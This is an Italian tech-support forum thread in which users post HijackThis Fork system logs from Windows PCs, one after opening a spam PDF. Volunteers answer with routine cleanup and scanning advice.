Importante Richiesta controllo Logfile of HijackThis

[ERCOLINO]

Il log mi sembra ok.

Fai queste cose.

1) Cancella tutti i file presente nella cartella Temp

C:Windows/Temp

2) Cancella tutti i punti di ripristino, molte volte rimangono li dentro virus e schifezze e tocca fare pulizia

3)Cancella completamente cache e cookies dai vari browser usati

4)Verifica tra i programmi installati che non ci sia niente di strano che non riconosci

5) Scansione completa con Malwarebytes

6)Poi nuovamente scansione completa con Windows Defender

 

[gig60]

Il log mi sembra ok.

Fai queste cose.

1) Cancella tutti i file presente nella cartella Temp

C:Windows/Temp

2) Cancella tutti i punti di ripristino, molte volte rimangono li dentro virus e schifezze e tocca fare pulizia

3)Cancella completamente cache e cookies dai vari browser usati

4)Verifica tra i programmi installati che non ci sia niente di strano che non riconosci

5) Scansione completa con Malwarebytes

6)Poi nuovamente scansione completa con Windows Defender

Ci sono due cartelle che non si cancellano perché è necessaria l'autorizzazione di SYSTEM
81587A2B-6A6C-49AE-9F13-59C78DE673EE1ea4.1dab5818377d6ee
D391F861-DB8E-47E6-A63B-D6BE81FD2D9C1f38.1da75f2f710b966

 

[ERCOLINO]

Ci sono due cartelle che non si cancellano perché è necessaria l'autorizzazione di SYSTEM
81587A2B-6A6C-49AE-9F13-59C78DE673EE1ea4.1dab5818377d6ee
D391F861-DB8E-47E6-A63B-D6BE81FD2D9C1f38.1da75f2f710b966

Prova a dare l'autorizzazione

 

[gig60]

Prova a dare l'autorizzazione

Ho provato ma non gli va bene. Ho cercato i tutorial di windows ma mi vengono messaggi sulla sicurezza del sistema e non mi fido a fare le modifiche che suggeriscono

 

[ERCOLINO]

Vabbe lascia cosi quei due.

Fai il resto

 

[gig60]

Ho fatto tutto, per malwarebites è tutto ok
Secondo te, malwarebites ha senso tenerlo una volta finiti i 14 gg di prova?
Grazie di tutto!!!

 

[ERCOLINO]

Ho fatto tutto, per malwarebites è tutto ok
Secondo te, malwarebites ha senso tenerlo una volta finiti i 14 gg di prova?
Grazie di tutto!!!

Si.
La versione a pagamento ha la scansione in tempo reale e altre cosette.

Una volta che scadono i 14 giorni diventa normale e quindi la scansione la devi fare manualmente, mentre defender tornerà a lavorare in tempo reale.

Quindi ogni tanto puoi fare una scansione con defender e anche con Malwarebytes


Quindi ora non ti segnala più niente?

 

[gig60]

Malwarebites non segnala niente.
Grazie!!!

 

[ERCOLINO]

Dicevi che con defender invece lo segnalava sempre?

Tutto ok anche con lui?

 

[gig60]

Non so perché essendo attivo Malwarebites Defender risulta disattivato.

 

[ERCOLINO]

Non so perché essendo attivo Malwarebites Defender risulta disattivato.

Si viene disattivato automaticamente, ma dovresti comunque riuscire a lanciare una scansione manuale con defender

Scaduti i 14 giorni dovrebbe riattivarsi in automatico defender

 

[gig60]

Per defender risulta ancora presente ed attivo. Ho lanciato la scansione completa con defender e dopo lancio quella offline vediamo cosa succede.

 

[gig60]

Dicevi che con defender invece lo segnalava sempre?

Tutto ok anche con lui?

La scansione completa di Defender non ha trovato virus.
Però la Sicurezza di Windows continua a rilevare quelle due voci però credo siano bloccate.
Probabilmente la prossima volta faro "ignora"
Grazie di tutto e ciaooo

 

[ERCOLINO]

Se sono bloccate va bene

 

[Shark81]

Buonasera, potete dare un'occhiata al log? Mio padre ha aperto una e-mail di spam, quelle "classiche" su convocazione della polizia giudiziaria ed ha aperto il file pdf allegato. Non ha cliccato su nessun link. Nel dubbio ho fatto una scansione ed ho trovato il seguente trojan:Win32/Wacatac.A!ml
Messo in quarantena e subito rimosso. Non noto robe strane nel funzionamento del pc. Ecco il log:

Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.31

Platform: x64 Windows 11 (Pro), 10.0.22631.4169 (ReleaseId: 2009, 23H2), Service Pack: 0
Time: 02.10.2024 - 20:13 (UTC+02:00)
Language: OS: Italian (0x410). Display: Italian (0x410). Non-Unicode: Italian (0x410)
Memory: 3347 MiB Free (56 %). CPU Loading: (13 %)
Elevated: Yes
Ran by: Utente (group: Administrators) on DESKTOP-1P10C2Q, FirstRun: yes

Chrome: 129.0.6668.71
Internet Explorer: 11.0.22621.3527
Default: "C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)

Boot mode: Normal

Running processes:
Number | Path
1 C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
1 C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
1 C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe
1 C:\Program Files (x86)\EPSON Software\Epson Printer Connection Checker\EPPCCMON.EXE
1 C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
1 C:\Program Files (x86)\epson\MyEpson Portal\mep.exe
1 C:\Program Files (x86)\epson\MyEpson Portal\mepService.exe
1 C:\Program Files (x86)\HP\HPAudioSwitch\HPAudioSwitch.exe
1 C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
12 C:\Program Files (x86)\Microsoft\EdgeWebView\Application\129.0.2792.65\msedgewebview2.exe
1 C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
1 C:\Program Files\HPCommRecovery\HPCommRecovery.exe
1 C:\Program Files\WindowsApps\AD2F1837.HPSystemEventUtility_1.7.1.0_x64__v10z8vjag6ke6\SystemEventUtility\HPSystemEventUtilityBackground.exe
1 C:\Program Files\WindowsApps\AD2F1837.HPSystemEventUtility_1.7.1.0_x64__v10z8vjag6ke6\SystemEventUtility\HPSystemEventUtilityHost.exe
1 C:\Program Files\WindowsApps\AD2F1837.myHP_37.52435.995.0_x64__v10z8vjag6ke6\HP.myHP.exe
1 C:\Program Files\WindowsApps\AD2F1837.myHP_37.52435.995.0_x64__v10z8vjag6ke6\win32\DesktopExtension.exe
1 C:\Program Files\WindowsApps\AdvancedMicroDevicesInc-2.AMDRadeonSoftware_10.22.20073.0_x64__0a9344xs7nr4m\radeonsoftware\AMDRSServ.exe
1 C:\Program Files\WindowsApps\AdvancedMicroDevicesInc-2.AMDRadeonSoftware_10.22.20073.0_x64__0a9344xs7nr4m\radeonsoftware\cncmd.exe
1 C:\Program Files\WindowsApps\AdvancedMicroDevicesInc-2.AMDRadeonSoftware_10.22.20073.0_x64__0a9344xs7nr4m\radeonsoftware\RadeonSoftware.exe
1 C:\Program Files\WindowsApps\Microsoft.WidgetsPlatformRuntime_1.5.0.0_x64__8wekyb3d8bbwe\WidgetService\WidgetService.exe
1 C:\Program Files\WindowsApps\Microsoft.YourPhone_1.24082.137.0_x64__8wekyb3d8bbwe\PhoneExperienceHost.exe
1 C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_524.24900.80.0_x64__cw5n1h2txyewy\Dashboard\Widgets.exe
1 C:\Program Files\WindowsApps\MicrosoftWindows.CrossDevice_1.24082.53.0_x64__cw5n1h2txyewy\CrossDeviceService.exe
1 C:\Program Files\WindowsApps\MSTeams_24243.1309.3132.617_x64__8wekyb3d8bbwe\ms-teams.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24080.9-0\MpDefenderCoreService.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24080.9-0\MsMpEng.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24080.9-0\NisSrv.exe
1 C:\Users\Utente\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe
1 C:\Users\Utente\Desktop\HiJackThis\HiJackThis.exe
1 C:\Windows\explorer.exe
1 C:\Windows\RtkBtManServ.exe
1 C:\Windows\splwow64.exe
1 C:\Windows\System32\AggregatorHost.exe
1 C:\Windows\System32\amdfendrsr.exe
1 C:\Windows\System32\audiodg.exe
1 C:\Windows\System32\backgroundTaskHost.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
1 C:\Windows\System32\dllhost.exe
1 C:\Windows\System32\DriverStore\FileRepository\hpanalyticscomp.inf_amd64_7dcf4ebd9d1b4772\x64\TouchpointAnalyticsClientService.exe
1 C:\Windows\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_98792a9ca78941b9\x64\AppHelperCap.exe
1 C:\Windows\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_98792a9ca78941b9\x64\DiagsCap.exe
1 C:\Windows\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_98792a9ca78941b9\x64\NetworkCap.exe
1 C:\Windows\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_98792a9ca78941b9\x64\SysInfoCap.exe
2 C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_7f98f584c61c8c61\RtkAudUService64.exe
1 C:\Windows\System32\DriverStore\FileRepository\u0385801.inf_amd64_14d64460460e078e\B385477\atieclxx.exe
1 C:\Windows\System32\DriverStore\FileRepository\u0385801.inf_amd64_14d64460460e078e\B385477\atiesrxx.exe
1 C:\Windows\System32\dwm.exe
1 C:\Windows\System32\escsvc64.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\LsaIso.exe
1 C:\Windows\System32\lsass.exe
5 C:\Windows\System32\RuntimeBroker.exe
2 C:\Windows\System32\SearchFilterHost.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SearchProtocolHost.exe
1 C:\Windows\System32\SECOMN64.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\SecurityHealthSystray.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smartscreen.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spool\drivers\x64\3\E_IATIILE.EXE
1 C:\Windows\System32\spoolsv.exe
82 C:\Windows\System32\svchost.exe
1 C:\Windows\System32\taskhostw.exe
2 C:\Windows\System32\wbem\unsecapp.exe
3 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
1 C:\Windows\UUS\Packages\Preview\amd64\MoUsoCoreWorker.exe

R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AA70284D-5B7D-4810-AE8D-2783EBE77D64}: [SuggestionsURL] = http://asp.assoc-amazon.co.uk/suggestions?q={searchTerms}&t=hp-uk1-vsb-21 - Amazon (UK) Search Suggestions
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AA70284D-5B7D-4810-AE8D-2783EBE77D64}: [SuggestionsURL_JSON] = http://completion.amazon.co.uk/search/complete?method=completion&q={searchTerms}&search-alias=aps&client=amzn-search-suggestions/9fe582406fb5106f343a84083d78795713c12d68&mkt=3 - Amazon (UK) Search Suggestions
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AA70284D-5B7D-4810-AE8D-2783EBE77D64}: = http://www.amazon.co.uk/s/ref=az...11E-EEE2-43CD-B792-DFDC0C69F7FB}" /F:"Update"

 

[Shark81]

O22 - Tasks: HPAudioSwitch - C:\Program Files (x86)\HP\HPAudioSwitch\HPAudioSwitch.exe
O22 - Tasks: OneDrive Reporting Task-S-1-5-21-1333562675-521320659-1612091880-1001 - C:\Users\Utente\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Tasks: RtkAudUService64_BG - C:\windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_7f98f584c61c8c61\RtkAudUService64.exe -background
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Clip\LicenseImdsIntegration - C:\WINDOWS\system32\fclip.exe (Microsoft)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Management\Autopilot\DetectHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},DetectHardwareChange - C:\Windows\System32\Autopilot.dll (Microsoft)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Management\Autopilot\RemediateHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},RemediateHardwareChange - C:\Windows\System32\Autopilot.dll (Microsoft)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Management\Provisioning\MdmDiagnosticsCleanup - C:\WINDOWS\system32\MdmDiagnosticsTool.exe /clean (Microsoft)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Tasks_Migrated: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Tasks_Migrated: \Hewlett-Packard\HP Support Assistant\HP Support Assistant Update Notice - C:\Program Files (x86)\HP\HP Support Framework\Resources\BingPopup\BingPopup.exe /show
O22 - Tasks_Migrated: \Hewlett-Packard\HP Support Assistant\WarrantyChecker - C:\Program Files (x86)\HP\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe
O22 - Tasks_Migrated: \Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan - C:\Program Files (x86)\HP\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe /DeviceScanR6
O22 - Tasks_Migrated: \HP\Consent Manager Launcher - C:\WINDOWS\system32\sc.exe start hptouchpointanalyticsservice
O22 - Tasks_Migrated: \Microsoft\Office\Office Performance Monitor - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\operfmon.exe (Microsoft)
O22 - Tasks_Migrated: \Microsoft\Windows\SMB\UninstallSMB1ClientTask - C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -NoProfile -WindowStyle Hidden "& C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\DisableUnusedSmb1.ps1 -Scenario Client"
O22 - Tasks_Migrated: \Microsoft\Windows\SMB\UninstallSMB1ServerTask - C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -NoProfile -WindowStyle Hidden "& C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\DisableUnusedSmb1.ps1 -Scenario Server"
O22 - Tasks_Migrated: \Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MpCmdRun.exe -IdleTask -TaskName WdCacheMaintenance (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Windows Defender\Windows Defender Cleanup - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MpCmdRun.exe -IdleTask -TaskName WdCleanup (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MpCmdRun.exe Scan -ScheduleJob -ScanTrigger 55 -IdleScheduledJob (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Windows Defender\Windows Defender Verification - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MpCmdRun.exe -IdleTask -TaskName WdVerification (file missing)
O22 - Tasks_Migrated: \Mozilla\Firefox Default Browser Agent E0B94B7A76D4D298 - C:\Users\Utente\AppData\Local\Mozilla Firefox\default-browser-agent.exe do-task "E0B94B7A76D4D298"
O22 - Tasks_Migrated: Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
O22 - Tasks_Migrated: EPSON XP-225 Series Update {9765D296-E0A9-4584-BB28-F9F5CD550809} - C:\windows\system32\spool\DRIVERS\x64\3\E_YTSNFE.EXE /EXE:"{9765D296-E0A9-4584-BB28-F9F5CD550809}" /F:"Update"
O22 - Tasks_Migrated: EPSON XP-225 Series Update {B54D3133-219B-48B3-B802-A60B48C52947} - C:\windows\system32\spool\DRIVERS\x64\3\E_YTSNFE.EXE /EXE:"{B54D3133-219B-48B3-B802-A60B48C52947}" /F:"Update"
O22 - Tasks_Migrated: GoogleUpdateTaskMachineCore{E577A329-94D8-4BFB-A5D9-EABDA7D6B3A7} - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Tasks_Migrated: GoogleUpdateTaskMachineUA{30096925-6CED-4B3B-B330-BDB1506D27B1} - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Tasks_Migrated: HPAudioSwitch - C:\Program Files (x86)\HP\HPAudioSwitch\HPAudioSwitch.exe
O22 - Tasks_Migrated: OneDrive Reporting Task-S-1-5-21-1333562675-521320659-1612091880-1001 - C:\Users\Utente\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Tasks_Migrated: RtkAudUService64_BG - C:\windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_7f98f584c61c8c61\RtkAudUService64.exe -background
O23 - Service R2: "Realtek Bluetooth Device Manager Service" ;RtkServ - (RtkBtManServ) - C:\WINDOWS\RtkBtManServ.exe
O23 - Service R2: Adobe Acrobat Update Service - (AdobeARMservice) - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service R2: AMD Crash Defender Service - C:\WINDOWS\System32\amdfendrsr.exe
O23 - Service R2: AMD External Events Utility - C:\WINDOWS\System32\DriverStore\FileRepository\u0385801.inf_amd64_14d64460460e078e\B385477\atiesrxx.exe
O23 - Service R2: Epson Scanner Service - (EpsonScanSvc) - C:\WINDOWS\system32\EscSvc64.exe
O23 - Service R2: HP App Helper HSA Service - (HPAppHelperCap) - C:\WINDOWS\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_98792a9ca78941b9\x64\AppHelperCap.exe
O23 - Service R2: HP Comm Recovery - (HP Comm Recover) - C:\Program Files\HPCommRecovery\HPCommRecovery.exe
O23 - Service R2: HP Diagnostics HSA Service - (HPDiagsCap) - C:\WINDOWS\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_98792a9ca78941b9\x64\DiagsCap.exe
O23 - Service R2: HP Insights Analytics - (HpTouchpointAnalyticsService) - C:\WINDOWS\System32\DriverStore\FileRepository\hpanalyticscomp.inf_amd64_7dcf4ebd9d1b4772\x64\TouchpointAnalyticsClientService.exe
O23 - Service R2: HP Network HSA Service - (HPNetworkCap) - C:\WINDOWS\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_98792a9ca78941b9\x64\NetworkCap.exe
O23 - Service R2: HP System Info HSA Service - (HPSysInfoCap) - C:\WINDOWS\System32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_98792a9ca78941b9\x64\SysInfoCap.exe
O23 - Service R2: Machine Debug Manager - (MDM) - C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe
O23 - Service R2: MyEpson Portal Service - C:\Program Files (x86)\EPSON\MyEpson Portal\mepService.exe
O23 - Service R2: Realtek Audio Universal Service - (RtkAudioUniversalService) - C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_7f98f584c61c8c61\RtkAudUService64.exe
O23 - Service R2: Servizio di base di Microsoft Defender - (MDCoreSvc) - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24080.9-0\MpDefenderCoreService.exe
O23 - Service R2: Sound Research SECOMN Service - (SECOMNService) - C:\WINDOWS\System32\SECOMN64.exe
O23 - Service S2: GoogleUpdater InternalService 130.0.6679.0 (GoogleUpdaterInternalService130.0.6679.0) - (GoogleUpdaterInternalService130.0.6679.0) - C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\updater.exe --system --windows-service --service=update-internal
O23 - Service S2: GoogleUpdater Service 130.0.6679.0 (GoogleUpdaterService130.0.6679.0) - (GoogleUpdaterService130.0.6679.0) - C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\updater.exe --system --windows-service --service=update
O23 - Service S2: Servizio Google Update (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files\Google\Chrome\Application\129.0.6668.71\elevation_service.exe
O23 - Service S3: Servizio Google Update (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc


--
End of file - Time spent: 16,5 sec. - 82256 bytes, CRC32: FFFFFFFF. Sign: 띟沙

 

[VIANELLO_85]

Mi sembra pulito.
Per il resto toglierei i primi due R4, visto che il link non mi pare il 'classico' sito di amazon.

 

[Shark81]

Grazie Vianello

 

[uno_a_caso]

Ciao,
il mio pc è abbastanz alento.
Potete dare un'occhiata cortesemente?

Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.31

Platform: x64 Windows 10 (Home), 10.0.19045.5131 (ReleaseId: 2009, 22H2), Service Pack: 0
Time: 08.12.2024 - 09:42 (UTC+01:00)
Language: OS: Italian (0x410). Display: Italian (0x410). Non-Unicode: Italian (0x410)
Memory: 3302 MiB Free (60 %). CPU Loading: (7 %)
Elevated: Yes
Ran by: mf (group: Administrators) on MF-PC, FirstRun: yes

Chrome: 131.0.6778.109
Internet Explorer: 11.0.19041.4355
Default: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument %1 (Microsoft Edge)

Boot mode: Normal

Running processes:
Number | Path
1 C:\Program Files (x86)\ASUS\ASUS Live Update\LiveUpdate.exe
1 C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe
1 C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe
1 C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe
1 C:\Program Files (x86)\ASUS\ASUS Virtual Touch\QuickGesture\x64\QuickGesture64.exe
1 C:\Program Files (x86)\ASUS\ASUS Virtual Touch\QuickGesture\x86\QuickGesture.exe
1 C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe
1 C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe
1 C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControlUser.exe
1 C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe
1 C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
1 C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
1 C:\Program Files (x86)\ASUS\InstantOn for NB\InsOnSrv.exe
1 C:\Program Files (x86)\ASUS\InstantOn for NB\InsOnWMI.exe
1 C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
1 C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe
1 C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
1 C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
2 C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
1 C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
9 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
1 C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\ismagent.exe
1 C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\updateui.exe
1 C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
1 C:\Program Files (x86)\Leica Geosystems\Cyclone\CyraLicense.exe
1 C:\Program Files (x86)\Leica Geosystems\Cyclone\FastObjectsServer.exe
1 C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
1 C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
1 C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.EXE
6 C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.80\msedgewebview2.exe
1 C:\Program Files (x86)\OpenOffice.org 3\program\scalc.exe
1 C:\Program Files (x86)\OpenOffice.org 3\program\soffice.bin
1 C:\Program Files (x86)\OpenOffice.org 3\program\soffice.exe
2 C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
9 C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
2 C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
1 C:\Program Files\ASUS\P4G\BatteryLife.exe
1 C:\Program Files\AVAST Software\Avast\aswEngSrv.exe
1 C:\Program Files\AVAST Software\Avast\aswidsagent.exe
1 C:\Program Files\AVAST Software\Avast\aswToolsSvc.exe
1 C:\Program Files\AVAST Software\Avast\AvastSvc.exe
5 C:\Program Files\AVAST Software\Avast\AvastUI.exe
1 C:\Program Files\AVAST Software\Avast\wsc_proxy.exe
1 C:\Program Files\CCleaner\CCleaner64.exe
1 C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe
1 C:\Program Files\Intel\iCLS Client\HeciServer.exe
2 C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
1 C:\Program Files\Windows Defender\MsMpEng.exe
1 C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2447.5.0_x64__cv1g1gvanyjgm\WhatsApp.exe
1 C:\Program Files\WindowsApps\Microsoft.BingFinance_4.53.63386.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Money.exe
5 C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2024.11100.16009.0_x64__8wekyb3d8bbwe\Photos.exe
1 C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_11.2409.0.0_x64__8wekyb3d8bbwe\CalculatorApp.exe
1 C:\Program Files\WindowsApps\Microsoft.YourPhone_1.24111.82.0_x64__8wekyb3d8bbwe\PhoneExperienceHost.exe
1 C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.24101.10041.0_x64__8wekyb3d8bbwe\Video.UI.exe
1 C:\Users\mf\Desktop\HiJackThis\HiJackThis.exe
1 C:\Windows\explorer.exe
1 C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
1 C:\Windows\System32\AggregatorHost.exe
1 C:\Windows\System32\ApplicationFrameHost.exe
1 C:\Windows\System32\audiodg.exe
1 C:\Windows\System32\CastSrv.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
1 C:\Windows\System32\dllhost.exe
1 C:\Windows\System32\dwm.exe
1 C:\Windows\System32\FBAgent.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\igfxCUIService.exe
1 C:\Windows\System32\lsass.exe
1 C:\Windows\System32\MoUsoCoreWorker.exe
1 C:\Windows\System32\oobe\UserOOBEBroker.exe
8 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\SecurityHealthSystray.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\SgrmBroker.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smartscreen.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spoolsv.exe
83 C:\Windows\System32\svchost.exe
3 C:\Windows\System32\taskhostw.exe
1 C:\Windows\System32\wbem\unsecapp.exe
2 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
2 C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
1 C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Bar] = https://www.google.com/?trackid=sp-006
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Page] = https://www.google.com/search?trackid=sp-006&q={searchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = https://it.search.yahoo.com/yhs/web...y_soverj_00_00&os_ver=10.0&os=Windows+10+Home
R0 - HKLM\Software\Microsoft\Internet Explorer\Main: [Start Page] = https://it.search.yahoo.com/yhs/web...y_soverj_00_00&os_ver=10.0&os=Windows+10+Home
